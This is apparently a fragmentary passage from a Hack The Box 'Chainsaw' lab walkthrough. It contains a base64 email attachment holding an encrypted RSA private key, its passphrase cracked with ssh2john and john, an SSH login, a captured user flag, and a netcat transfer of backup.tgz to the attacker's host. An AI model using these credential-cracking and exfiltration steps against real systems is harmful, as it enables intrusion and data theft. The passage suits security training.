IG5vcm1hbDsgZm9udC12YXJpYW50LWxpZ2F0dXJlczogbm9ybWFsOyBmb250LXZhcmlhbnQtY2Fw
czogbm9ybWFsOyBmb250LXdlaWdodDogNDAwOyBsZXR0ZXItc3BhY2luZzogbm9ybWFsOyBvcnBo
YW5zOiAyOyB0ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1pbmRlbnQ6IDBweDsgdGV4dC10cmFuc2Zv
cm06IG5vbmU7IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdpZG93czogMjsgd29yZC1zcGFjaW5nOiAw
cHg7IC13ZWJraXQtdGV4dC1zdHJva2Utd2lkdGg6IDBweDsgdGV4dC1kZWNvcmF0aW9uLXN0eWxl
OiBpbml0aWFsOyB0ZXh0LWRlY29yYXRpb24tY29sb3I6IGluaXRpYWw7IGJhY2tncm91bmQtY29s
b3I6IHJnYigyNTUsIDI1NSwgMjU1KTsiPklUIEFkbWluaXN0cmF0aW9uIERlcGFydG1lbnQ8YnI+
PC9kaXY+
-----------------------b83a7caaf0d2b0cf7e7d1db209fe02c8--
-----------------------7f20f83acebf27b41b3213e5d27e6f04
Content-Type: application/octet-stream; filename="wendy.key.enc"; name="wendy.key.enc"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="wendy.key.enc"; name="wendy.key.enc"

LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRF
Sy1JbmZvOiBERVMtRURFMy1DQkMsRDM5OThDRjkwNjhDMjA5MgoKUVFVTHUzTFFEaDJrRitsNnZI
TTY0Ym16Q3ZWaFpHY1lWTjhmakFLTnFyZ1N6OG5Oa0JMNzRhbkR1SmVyeXdaWAp0bW55b0ZTR2wx
dUt6TjNudEd5a3hHMmxKT1duVkxOdnZOZXJOelZwTHdQWXBUWG5ON2xqelMrdXBMNm1LeHhPCnBJ
VUxaemxhTWIwSy9CMFBrc1FITlNIMHd2K3c2K3dqSndGQ1JROEw0Z0E4dTVzUE8rdUpPaDdTN1hM
M3JSemgKOXFMMmdodW1RdHFHbzVzVCtmazVSRDNXVlNzcUlGZTRQQ1gvNGx5MGpSaXI2bEk4N2FM
U0pzMG5rdU0vYnhETQo4eUk1czJYM0g0TkRTcjlmVFBsemVjUkQ5Y1VVVXlkMFI4b1NEdThqbStD
YWRUQzB6bHdxMTAyOFo5QVdkQm1uCmN6T3h3alhiWHZIZVJXcWErN2dlekN3RGdZekJEMUx2Ny9F
eXVPTnBTOU5vZ0t0ZjRXa1pQSHRySjVwQXBESW4KNlZFMmZZeEVCK0hqMW84aGZSUEdTUVJsa0pr
ajF2WlYzck5wM2lDWC9MRE5wTWR4UHdIanJLOVFyWDRUbzFRcAoxcWF3cjVUOGk1MDdqN1d6bWtL
Tjl1ZXd3bHJYbm54UEFOc1Rwc1gxZFZhM1g5c2x3bXZySDh3R1VCSkVXR044CkZqU3ZsMWl4UDdB
WnkzcWNkdlRtcDBhMmZmYVNpNzh4NDhKb3lmNElaN295WGlUTUxQdzdYNHgwcXBzMzYxZnYKQ0Rs
RXljM0hwc0tuTGlwM2hocms1a1V2Y0Ntck9WZmtudTRLQzFveVJ5K2UwNVJIZGt6dXFBUzM5cUVE
SHF4Qgp2Q2dQbkhsOWtVWUNtQmthWkZQMm5qbmpOV2tNWVVnbFlJclN2VUFOaXlJTzk1dWR1TlRv
d0NqNENDTXcya1dUCkM3Z3NNSVdkeVlwYzN0WHNrZ3ZsQ2FpWWhkemJpVVlzVVEwbkZBbktBaDZU
TjBETUlKeGlpRFJuOEsvemJpakUKTVNLdDhMd0d5a0lrYTdzeTFOenU5QWNIbG9uVTBIKy9iaFZz
QVJsT3hIQk1wbTJaN3F5T3pCejJTRmdrQW1NKwo3eE9hbTdCMDFDWUY5OEYvZmw4RjV3SlRzZE95
OXdST3JoVSt0TEw1ZXEwZmw4eDJWRENJRDJaNk05ZEtQVnZVCmVPYUVzYW0xbUlRczBHVElwUTM0
OTlTSDhLU09OR0thVU5qWVdmNDZYWGdJZWU4aVpqT2JuYkdVeHUyb1NPbEoKOHprNlNOZ2tCZzZ4
R2dPbU9PWFlxSE5XU1U4MmI0cVhsLy9MR1lQQ2RRUEx2a1FmNDZ6eXdSWEQ5dnQrQURseApLM2d4
SkZBTllldWQ2WllSb0hwZkkrOWo4NGVoTDNqaGphbkRQT3gzUlVtQVpHWXRYczlZajFoMms4bWFP
SlhCCnRnelhnR0tuL1NnWlI2Szd1dzdFNDh3amoxdTBTZzFueDJMTVFnejl3cVdvM3JhYW1SUzVY
a2JnVUduZElhSngKWXVscythak1OekhZcy9zaWd6b2d3dnUwVXp2ZVFqcjBxYkhyVnhmSmFrK1JR
TElpOFBqdnUvSjM0bE5FSENFcAp0a2lMU05BNnFCL29helNlL2xzM2RPQ09sSk9UUTBZbWZIQ29F
WkRPbVR5TmhFMThDZndzNkowRUFTVzRRUFoxCnkvMVNLaVdKOHZqRko4czdRRDN5R0xNV0oxUFls
aFZlS2UwRUZDTDE4T2xZNHNkU3lkODJPZm5NY0xiMVNoM1UKN3FWTkNOa2tUV2hSQ29GQ3NDQ0RI
RXJqS0ZNdkl0UW0xaGtSNXpzT1phZXZ1ZHZnOTd2OEZhc3BLeUN0c2NwYQp3WVhjOGpUa2FmWVpO
N1ZIQXRFYXZoWHc5MzdyMGpJSG5BdDBUejI0VTlPUWVDMW8rN1UvZWxRUUVCMUcxbnhhCmZQTWwy
UFRkQkR0SUsrRy8rcE1SQ2RFR2lSdFhDU2JpWXRkRTVMM2NRZVVMd2ZhaDI2dHdyaXl6TE9nODFN
N0QKWCtscVhmZEROYTMrN3FlajNUWDdzT2NkZFB6WjMrckp4ampzeGl5SmFtMTM0aVZlNEUvazkw
UjNNUWdkZ2RVVAotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQ==
-----------------------7f20f83acebf27b41b3213e5d27e6f04--
administrator@chainsaw:/home$ 


administrator@chainsaw:/home/administrator$ grep -Ri "ssh" ~/.ipfs
grep -Ri "ssh" ~/.ipfs
Binary file /home/administrator/.ipfs/blocks/YT/CIQFQSMBQSYZ4M4JDDO2PE4N4JMPWVOM6LQMC33HAA4NRHMRVOMQYTI.data matches
Binary file /home/administrator/.ipfs/blocks/TH/CIQBJTU2NYBPEHU6KW36B42MGKWZ5K3C3ABL5ZD3TUZPGEHYGUFETHQ.data matches
Binary file /home/administrator/.ipfs/blocks/J3/CIQIQOWEH4WD7LHKUGKG4DITAFU3WV53ME3IK5VN3CI3LBDOVKEXJ3I.data matches
/home/administrator/.ipfs/blocks/6G/CIQI6O3J3F6FXEU2EQ3FY57EG7LQIVAOE65WGLNUZD2AKHOTGZF36GQ.data:	pub = pubkey.exportKey('OpenSSH')
Binary file /home/administrator/.ipfs/blocks/2Q/CIQFQOBIJC3O5ZPHHDVPAAN7ZF4DRSNJHAZBTX44R3VZJYUXDY5X2QI.data matches
Binary file /home/administrator/.ipfs/blocks/GD/CIQNAJZ6RHRYGZZ5EZOLPFVXC7PJUSDQJFI6OAQ6FDHU7J6BGEWJGDQ.data matches



root@kali:~/HTB/Chainsaw# base64 -d bobby.key.enc
root@kali:~/HTB/Chainsaw# python ssh2john.py id_rsa > tojohnformat.txt
root@kali:~/HTB/Chainsaw# john --wordlist=/usr/share/wordlists/rockyou.txt tojohnformat.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
jackychain       (id_rsa)
1g 0:00:00:28 DONE (2019-07-23 20:07) 0.03536g/s 507132p/s 507132c/s 507132C/sa6_123..*7Vamos!
Session completed

root@kali:~/HTB/Chainsaw# chmod 600 id_rsa
root@kali:~/HTB/Chainsaw# ssh -i id_rsa bobby@10.10.10.142
Enter passphrase for key 'id_rsa': 
bobby@chainsaw:~$ ls -a
.   backup.tgz     .bash_logout  .cache  .java   .profile  resources  user.txt
..  .bash_history  .bashrc       .gnupg  .local  projects  .ssh       .wget-hsts
bobby@chainsaw:~$ cat user.txt
af8d9df991cc59b300568dc059d432eb
bobby@chainsaw:~$ 

bobby@chainsaw:~$ nc -w 3 10.10.16.57 1234 < backup.tgz
root@kali:~/HTB/Chainsaw# nc -l -p 1234 > backup.tgz

root     20279  0.0  0.0      0     0 ?        I    12:07   0:00 [kworker/1:2]
root     20521  0.0  0.0   2372   788 pts/3    S    12:18   0:00 /home/bobby/projects/ChainsawClub/ChainsawClub
root     20522  0.0  0.0   2616   848 pts/3    S    12:18   0:00 sh -c sudo -i -u root /root/ChainsawClub/dist/ChainsawClub/Chainsa
